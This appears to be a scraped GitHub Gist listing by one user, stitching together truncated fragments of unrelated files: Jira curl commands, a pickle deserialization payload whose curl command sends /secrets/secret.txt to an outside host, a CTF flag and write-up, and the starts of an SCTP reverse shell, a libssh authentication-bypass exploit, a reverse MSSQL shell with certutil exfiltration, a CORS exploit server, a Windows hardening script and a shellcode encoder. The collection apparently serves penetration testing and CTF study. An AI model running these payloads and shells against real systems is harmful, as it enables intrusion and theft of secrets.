@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:47 — forked from TheMightyLlama/jira-curl.sh
Perform actions on a jira issue via curl
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions of a project (a read-only request, so GET rather than PUT; the header is sent with -H, not as a body with -d)
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions
#Returns all issues in a version
#This URL requires the version ID of a single version, which is provided by the query above (again a read-only GET; the JQL is URL-encoded so the quotes survive the shell)
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" "http://localhost:8080/jira/rest/api/2/search?jql=project%3D%22AN%22+AND+fixVersion%3D%2712345%27"
cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}
-- challenge 1:
From the name of the challenge it was a dead giveaway that there was a .git folder exposed.
Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config
And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally check all the commits and on this one at the bottom of the page you can read a flag:
@ricardojba
ricardojba / sctp_reverse_shell.py
Created December 3, 2018 17:29 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
@ricardojba
ricardojba / php-curl-crlf-injection.mkd
Created August 1, 2018 16:01 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@ricardojba
ricardojba / mandros.py
Created July 4, 2018 09:35 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / cors_exploit_server.py
Created June 29, 2018 11:24
Python Simple HTTP Server for testing or exploiting CORS
#!/usr/bin/env python
from sys import argv
import BaseHTTPServer
import ssl
class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200, "ok")
        #self.send_header('Access-Control-Allow-Origin', '*')
@ricardojba
ricardojba / windows_hardening.cmd
Last active May 4, 2024 21:26
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
@ricardojba
ricardojba / ascii-shellcode-encoder.py
Created November 20, 2017 17:26 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract-arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives the program a binary encoded shellcode as input,
# and it yields on the output its ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving